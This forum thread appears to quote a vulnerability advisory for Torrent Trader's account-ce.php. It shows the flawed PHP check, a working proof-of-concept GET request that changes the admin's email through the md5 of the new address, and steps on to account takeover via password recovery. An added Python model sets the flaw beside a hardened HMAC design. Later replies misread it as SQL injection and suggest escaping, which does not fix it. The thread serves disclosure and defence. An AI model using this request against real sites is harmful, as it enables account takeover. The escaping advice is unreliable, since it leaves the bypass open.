Bravo List - Torrent Trader - Unauthorized Email Change
http://www.bvlist.com/showthread.php?t=11969

BamBam0077 9th April 2019 19:28

Unauthorized Email Change
 
###############################################################################
1. Unauthorized Email Change in "account-ce.php"
###############################################################################

Reason: authorization bypass
Attack vector: user submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's

-----------------[ source code start ]---------------------------------

PHP Code:

$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'");
$row = mysql_fetch_assoc($res);
$sec = $row["editsecret"];
// editsecret is '' for every user who has no pending change request,
// so for them the expected value is simply md5($email), which anyone can compute
if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));

-----------------[ source code end ]-----------------------------------

Tests: Let's find the md5 hash of the email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452".
The target user ID is 1. We issue the GET request: http://localhost/torrenttrader208/account-ce.php?id=1&secret=b642b4217b34b1e8d3bd915fc65c4452&email=test@test.com
A quick look at the database confirms that the email address of the user with ID 1 has indeed been changed.
The next logical move for the attacker is a password recovery request: http://localhost/torrenttrader208/account-recover.php
After admin account takeover the attacker is able to use the next vulnerability, described below, which may allow PHP remote code execution.

###############################################################################
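Added example, not code from the advisory or from the Torrent Trader code base: a Python model of the account-ce.php decision quoted above, placed next to a hardened version so the two can be run side by side. The in-memory user table, the e-mail addresses, and the request_email_change()/hardened_account_ce() design (random per-request secret, HMAC-SHA256 bound to the new address, constant-time compare, single use) are assumptions made for this illustration.

```python
import hashlib
import hmac
import secrets


def make_users():
    """Constructed stand-in for the `users` table; only the columns the
    advisory's queries touch are modelled. User 1 is the admin, who never
    asked for an e-mail change, so editsecret is '' exactly as in a live table."""
    return {
        1: {"email": "admin@example.com", "editsecret": "", "enabled": "yes", "status": "confirmed"},
        2: {"email": "bob@example.com", "editsecret": "", "enabled": "yes", "status": "confirmed"},
    }


def _lookup(users, uid):
    # SELECT editsecret FROM users WHERE enabled = 'yes' AND status = 'confirmed' AND id = '$id'
    row = users.get(uid)
    if row is None or row["enabled"] != "yes" or row["status"] != "confirmed":
        return None
    return row


def vulnerable_account_ce(users, uid, secret, email):
    """Same decision as account-ce.php in the post: the caller is trusted when
    secret == md5(editsecret . email . editsecret). Nothing checks that a change
    was ever requested, so an empty editsecret turns the expected value into
    md5(email), which the attacker computes offline."""
    row = _lookup(users, uid)
    if row is None:
        return False
    sec = row["editsecret"]
    if secret != hashlib.md5((sec + email + sec).encode()).hexdigest():
        return False
    row["email"] = email          # UPDATE users SET editsecret = '', email = ...
    row["editsecret"] = ""
    return True


def forge_secret(email):
    """What the attacker sends as ?secret= for any user with no pending request."""
    return hashlib.md5(email.encode()).hexdigest()


def request_email_change(users, uid, new_email):
    """Hardened step 1 (assumed design): store a fresh random secret for the
    user and return the token that would be mailed to the *current* address."""
    row = _lookup(users, uid)
    if row is None:
        return None
    row["editsecret"] = secrets.token_hex(16)
    return hmac.new(row["editsecret"].encode(), new_email.encode(), hashlib.sha256).hexdigest()


def hardened_account_ce(users, uid, secret, email):
    """Hardened step 2 (assumed design): refuse when no change is pending,
    bind the token to the new address, compare in constant time, and clear
    the secret so the token cannot be replayed."""
    row = _lookup(users, uid)
    if row is None or not row["editsecret"]:
        return False
    expected = hmac.new(row["editsecret"].encode(), email.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(secret, expected):
        return False
    row["email"] = email
    row["editsecret"] = ""
    return True


if __name__ == "__main__":
    forged = forge_secret("test@test.com")
    users = make_users()
    print("vulnerable, forged secret, id=1:", vulnerable_account_ce(users, 1, forged, "test@test.com"), users[1]["email"])
    users = make_users()
    print("hardened,   forged secret, id=1:", hardened_account_ce(users, 1, forged, "test@test.com"), users[1]["email"])
    token = request_email_change(users, 1, "new@example.com")
    print("hardened,   mailed token,  id=1:", hardened_account_ce(users, 1, token, "new@example.com"), users[1]["email"])
```

Running it shows the vulnerable check accepting md5("test@test.com") for user 1 and the hardened check refusing the same request because no change is pending; only a token produced by request_email_change() for that exact address is accepted, and only once. Note that escaping the parameters with sqlesc() would change nothing here: the attacker never breaks the query syntax, the query does exactly what it was written to do.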

MicroMonkey 13th April 2019 05:15

What is that? Please explain in full detail.

BamBam0077 13th April 2019 15:36

Reason: authorization bypass
Attack vector: user submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's
Code:

$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
..
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'");
$row = mysql_fetch_assoc($res);
..
$sec = $row["editsecret"];
if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));

Tests: Let's find the md5 hash of the email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452". The target user ID is 1. We issue the GET request: http://localhost/torrenttrader208/account-ce.php?id=1&secret=b642b4217b34b1e8d3bd915fc65c4452&email=test@test.com

A quick look at the database confirms that the email address of the user with ID 1 has indeed been changed.

The next logical move for the attacker is a password recovery request: http://localhost/torrenttrader208/account-recover.php After admin account takeover the attacker is able to use the next vulnerability, described below, which may allow PHP remote code execution.

M-jay 30th April 2019 16:22

This would be SQL injection, correct? I've been looking at adding something to improve this. So far it looks like PDO is the best, or can you do it using composer.json?
I'm new to this, but could you point us in the right direction to implement one of these?

BamBam0077 21st October 2019 19:39

Just sanitize the variables in the SQL query where necessary with sqlesc() or mysqli_real_escape_string() if you have converted over to mysqli, and I believe try to use trim() around:

PHP Code:

$md5 = $_GET["secret"];
$email = $_GET["email"];
$sec = $row["editsecret"];

SQL ESC
PHP Code:

$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '".sqlesc($id)."'");

AND

// note: in the UPDATE below sqlesc() is used without surrounding quotes, so it supplies its own;
// wrapping sqlesc($id) in '...' here would double-quote the value ($id is already cast to int above)
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '".sqlesc($id)."' AND `editsecret` = " . sqlesc($row["editsecret"]));

NOT TESTED YET, WILL TRY WHEN PC HAS ARRIVED

